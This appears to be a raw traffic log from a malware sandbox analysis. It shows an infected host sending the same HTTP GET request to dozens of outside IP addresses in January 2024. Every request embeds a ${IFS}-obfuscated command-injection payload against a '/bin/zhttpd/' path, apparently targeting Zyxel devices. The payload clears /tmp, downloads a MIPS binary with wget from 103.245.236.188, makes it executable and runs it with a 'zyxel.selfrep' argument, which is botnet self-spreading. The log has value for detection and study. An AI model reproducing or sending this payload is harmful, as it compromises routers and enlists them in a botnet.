                                                Jan 12, 2024 18:16:08.110809088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                676192.168.2.2335158131.185.132.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110888958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                677192.168.2.2350814135.154.91.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110946894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                678192.168.2.233957645.15.209.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110999107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                679192.168.2.233830443.60.239.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111056089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                680192.168.2.2339230154.237.136.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111110926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                681192.168.2.235171423.179.184.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111166954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                682192.168.2.234508874.82.52.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111213923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                683192.168.2.2357000167.206.39.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111274958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                684192.168.2.233471624.228.145.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111313105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                685192.168.2.235956439.164.91.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111360073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                686192.168.2.234409224.75.164.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111393929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                687192.168.2.234256852.239.16.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111434937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                688192.168.2.2358636124.194.86.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111479044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                689192.168.2.2355840137.14.26.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111547947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                690192.168.2.2339258176.163.162.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111613035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                691192.168.2.2355458128.183.66.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111669064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                692192.168.2.2359338130.198.16.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111721992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                693192.168.2.233632295.104.131.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111785889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                694192.168.2.2348718181.181.97.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111848116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                695192.168.2.235321854.152.42.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111906052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                696192.168.2.235174218.8.186.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.111964941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                697192.168.2.2348858197.109.167.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112020969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                698192.168.2.233671488.13.158.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112046957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                699192.168.2.234304036.75.105.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112123966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                700192.168.2.2358624138.56.191.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112175941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                701192.168.2.2351816210.195.111.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112237930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                702192.168.2.2332978191.81.110.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112315893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                703192.168.2.2339238135.141.57.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112368107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                704192.168.2.2339924108.61.60.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112382889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                705192.168.2.2360552163.98.8.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112456083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                706192.168.2.2351222218.15.192.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112504005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                707192.168.2.234974484.19.166.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112557888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                708192.168.2.2357214121.80.186.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112622023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                709192.168.2.2352294156.159.193.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112646103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                710192.168.2.2360270152.150.224.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112708092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                711192.168.2.235876267.75.154.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112762928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                712192.168.2.2335194107.17.115.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112832069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                713192.168.2.2357148155.193.201.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112864971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                714192.168.2.2339406121.174.104.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112931967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                715192.168.2.234369077.212.148.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.112968922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                716192.168.2.2342448132.33.141.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113082886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                717192.168.2.2334190148.27.252.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113137007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                718192.168.2.235018488.18.242.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113229036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                719192.168.2.233662820.150.102.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113292933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                720192.168.2.233994039.157.162.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113343954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                721192.168.2.2336112180.160.196.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113420010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                722192.168.2.233528064.242.30.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113462925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                723192.168.2.2334024220.60.3.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113553047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                724192.168.2.2336418169.235.164.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113620996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                725192.168.2.2348976135.81.7.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113694906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                726192.168.2.235024096.141.46.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113734007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                727192.168.2.235616040.151.246.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113792896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                728192.168.2.234467634.129.167.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113840103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                729192.168.2.2350826113.6.24.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113894939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                730192.168.2.233516846.140.18.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.113959074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                731192.168.2.233858086.30.87.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114028931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                732192.168.2.2339294141.245.254.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114089966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                733192.168.2.2350314103.221.191.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114141941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                734192.168.2.2337472116.117.225.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114306927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                735192.168.2.2332946199.194.102.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114362001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                736192.168.2.234649290.84.201.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114439011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                737192.168.2.234083078.176.51.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.114507914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                738192.168.2.2338758109.195.118.63443
                                                TimestampBytes transferredDirectionData
